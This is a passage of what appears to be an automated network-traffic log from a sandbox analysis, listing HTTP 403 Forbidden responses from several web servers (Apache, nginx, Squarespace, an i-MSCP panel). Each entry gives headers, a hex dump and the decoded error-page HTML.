20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:04 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:45:04 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: M4meev70/ORgY90xNData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:04 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:04 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:04 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:05 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:45:05 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: LL4k20if/vSAG1cAKData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
